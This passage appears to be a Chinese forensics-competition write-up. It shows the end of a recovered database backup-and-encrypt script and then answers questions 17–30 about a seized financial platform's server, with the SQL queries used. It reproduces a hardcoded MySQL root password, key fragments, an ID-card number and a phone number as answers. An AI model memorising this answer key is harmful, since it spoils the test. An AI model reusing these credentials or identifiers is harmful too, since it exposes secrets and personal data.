print("[*] 正在备份数据库...")
print(" 数据库: %s" % db_name)
print(" 输出: %s" % output_path)
print("")

try:
# 步骤1: mysqldump -> 临时gz文件
temp_sql = '/tmp/backup_temp.sql'
dump_cmd = 'mysqldump -uroot -p"pgscup@o26" --single-transaction --quick %s > %s' % (db_name, temp_sql)
print("[*] 执行mysqldump...")
ret = os.system(dump_cmd)
if ret != 0:
print("[ERROR] mysqldump失败, 返回码: %d" % ret)
sys.exit(1)
print("[OK] mysqldump完成")

# 步骤2: gzip压缩
temp_gz = '/tmp/backup_temp.sql.gz'
gzip_cmd = 'gzip -9 -c < %s > %s' % (temp_sql, temp_gz)
print("[*] 执行gzip压缩...")
ret = os.system(gzip_cmd)
if ret != 0:
print("[ERROR] gzip失败, 返回码: %d" % ret)
os.remove(temp_sql)
sys.exit(1)
print("[OK] gzip压缩完成")
os.remove(temp_sql)

# 步骤3: openssl加密 (去掉-pbkdf2选项,兼容老版本openssl)
print("[*] 执行openssl加密...")
openssl_cmd = 'openssl aes-256-cbc -salt -pass pass:%s -in %s -out %s' % (password, temp_gz, output_path)
ret = os.system(openssl_cmd)
if ret != 0:
print("[ERROR] openssl失败, 返回码: %d" % ret)
os.remove(temp_gz)
sys.exit(1)
print("[OK] openssl加密完成")
os.remove(temp_gz)

size = os.path.getsize(output_path)
print("")
print("[OK] 完成: %s (%.2f MB)" % (output_path, size/1024/1024))
print("")
print("[INFO] 数据库备份密码: %s" % password)

except Exception as e:
print("[ERROR] %s" % str(e))
sys.exit(1)

else:
if not input_path or not output_path:
print("[ERROR] 请指定输入和输出文件路径")
print("用法: python encrypt_tool.py --input <文件> --output <输出>")
sys.exit(1)

if not os.path.exists(input_path):
print("[ERROR] 文件不存在: %s" % input_path)
sys.exit(1)

parent_dir = os.path.dirname(output_path)
if parent_dir and not os.path.exists(parent_dir):
os.makedirs(parent_dir)

encrypt_file(input_path, output_path)
print("")
print("[OK] 加密完成")


if __name__ == "__main__":
main()

进程已结束,退出代码为 0

17.对集群内的服务器进行分析,服务器中加密工具第1层加密的XOR密钥是什么?[答案格式:按实际填写]
0x5a

18.对集群内的服务器进行分析,给出MySQL数据库root用户的密码?[答案格式:abc@123]
pgscup@o26
在上面有

19.对集群内的服务器进行分析,请给出网站后台数据库中存放聊天记录的数据表名字?[答案格式:adb_def]
找到已解密的数据库文件backup decrypted
image.png

导出,用弘连的数据库工具分析,选择 sql 文件


user_chat
20.对集群内的服务器进行分析,分析网站后台用户密码加密算法中type=0时的初始盐值是什么[答案格式:ABC]

image.png
vscode真是个好东西…
21.对集群内的服务器进行应用取证,提取该Laravel应用的APP_KEY值的后8位?[答案格式:英文数字混合字符串]\
注意到.obf后缀,应该和计算机第一部分20题是一道题,还是要解密…
otS+rWI=
image.png
pgscup@o26

22.对集群内的服务器进行取证分析,金麟资本理财网站后台有多少个机器人?[答案格式:123]
image.png
3个

23.对集群内的服务器进行资金流水取证,提取该平台数据库中聊天记录总数?[答案格式:123]
image.png
11494
24.对集群内的服务器进行数据库取证,提取该平台数据库中注册用户总记录数?[答案格式:123]
image.png
21722
25.对集群内的服务器进行取证分析,提取平台内用户季丽华的身份证号?[答案格式:18位身份证]
image.png
370100196901274436

26.对集群内的服务器进行资金流水取证,提取该平台数据库中钱包流水金额第二大的用户名字?[答案格式:张三]
image.png

1
2
3
4
5
SELECT ur.name, total_amount 
FROM (SELECT w.user_id, SUM(w.change) AS total_amount FROM wallet_log w GROUP BY w.user_id) AS t
JOIN user_real ur ON t.user_id = ur.user_id
ORDER BY ABS(t.total_amount) DESC
LIMIT 2;

27.对集群内的服务器进行数据库取证,提取该平台法币交易中交易笔数最多的卖家的交易笔数?[答案格式:123]
image.png
1
2
3
4
SELECT seller_id, COUNT(*) AS deal_count 
FROM legal_deal
GROUP BY seller_id
ORDER BY deal_count DESC

28.对集群内的服务器进行资金流水取证,提取该平台已完成结算的杠杆交易中保证金总额最多的用户的保证金总额?[答案格式:100.00]
Uploading file...hcv1d

1
2
3
4
5
SELECT user_id,SUM(l.caution_money) AS total_caution 
FROM lever_transaction l
WHERE l.status = 3
GROUP BY l.user_id
ORDER BY total_caution DESC ;

29.对集群内的服务器进行资金流水取证,提取该平台商家中余额最小的商家的手机号?[答案格式:18036310808]
image.png
数据量小,用眼瞪就行
15860623709

30.对集群内的服务器进行资金流水取证,提取该平台商家中余额最小的商家的余额?[答案格式:100.0]
8461.4
image.png